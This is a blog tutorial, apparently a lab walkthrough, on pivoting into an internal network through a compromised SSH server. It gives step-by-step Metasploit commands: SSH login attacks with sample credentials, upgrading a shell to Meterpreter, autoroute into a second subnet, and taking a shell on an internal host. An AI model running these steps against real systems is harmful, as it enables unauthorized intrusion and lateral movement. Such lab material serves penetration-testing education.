Pazar , 20 Eylül 2020
Home » Cyber Security » SSH Pivoting using Meterpreter
SSH Pivoting using Meterpreter 1 – ssh1

SSH Pivoting using Meterpreter

Pivoting is a technique to get inside an unreachable network with help of pivot (center point). In simple words, it is an attack through which an attacker can exploit that system which belongs to the different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then the attacker will able to target the client system for the attack.

SSH Pivoting using Meterpreter 2 – ssh

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

12345msf > use auxiliary/scanner/ssh/ssh_loginmsf auxiliary(ssh_login) > set rhosts 192.168.0.109msf auxiliary(ssh_login) > set username rajmsf auxiliary(ssh_login) > set password 123msf auxiliary(ssh_login) > exploit

From the given image you can observe that command shell session 1 opened

SSH Pivoting using Meterpreter 3 – 1

Now convert command shell into the meterpreter shell through the following command

1sessions –u 1

From the given image you can observe that Meterpreter session 2 opened

1sessions

Hence if you will count then currently attacker has hold 2 sessions, 1st for command shell and 2nd for the meterpreter shell of the SSH server.

SSH Pivoting using Meterpreter 4 – 2

Check network interface using ifconfig command

From the given image you can observe two network interface in the victim’s system 1st for IP 192.168.0.109 through which the attacker is connected and 2nd for IP 192.168.10.1 through which SSH client (targets) is connected.

SSH Pivoting using Meterpreter 5 – 3

Since the attacker belongs to 192.168.0.1 interface and client belongs to 192.168.10.0 interface, therefore, it is not possible to directly make an attack on client network until unless the attacker acquires the same network connection. In order to achieve 192.168.10.0 network attacker need to run the post exploitation “autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. The default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

1234msf > use post/multi/manage/autoroute msf post(autoroute) > set subnet 192.168.10.0msf post(autoroute) > set session 2msf post(autoroute) > exploit
SSH Pivoting using Meterpreter 6 – 4

This time we are exploiting SSH ignite (local client) therefore we are going to use the same module for it that had used above for SSH raj, only need to change information inside exploit.

12345msf > use auxiliary/scanner/ssh/ssh_loginmsf auxiliary(ssh_login) > set rhosts 192.168.10.2msf auxiliary(ssh_login) > set username ignitemsf auxiliary(ssh_login) > set password 1234msf auxiliary(ssh_login) > exploit

From given image, you can see another command shell 3 opened if you will count then total attack has hold 3 sessions, two for SSH server and one for the SSH client.

1sessions
  1. Command shell for SSH raj (192.168.0.109:22)
  2. Meterpreter shell for SSH raj (192.168.0.109)
  3. Command shell for SSH ignite (192.168.10.2:22)
SSH Pivoting using Meterpreter 7 – 5
1sessions 3

Now attacker is command shell of SSH ignite (client), let’s verify through network configuration.

1ifconfig

From given, you can observe the network IP is 192.168.10.2

SSH Pivoting using Meterpreter 8 – 6

3 Yorumlar

  1. Pingback: Multiple Ways to Secure SSH Port - Teknoloji Uzayı

  2. Pingback: Comprehensive Guide on SSH Tunneling - Teknoloji Uzayı

  3. Pingback: SSH Key - Teknoloji Uzayı

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir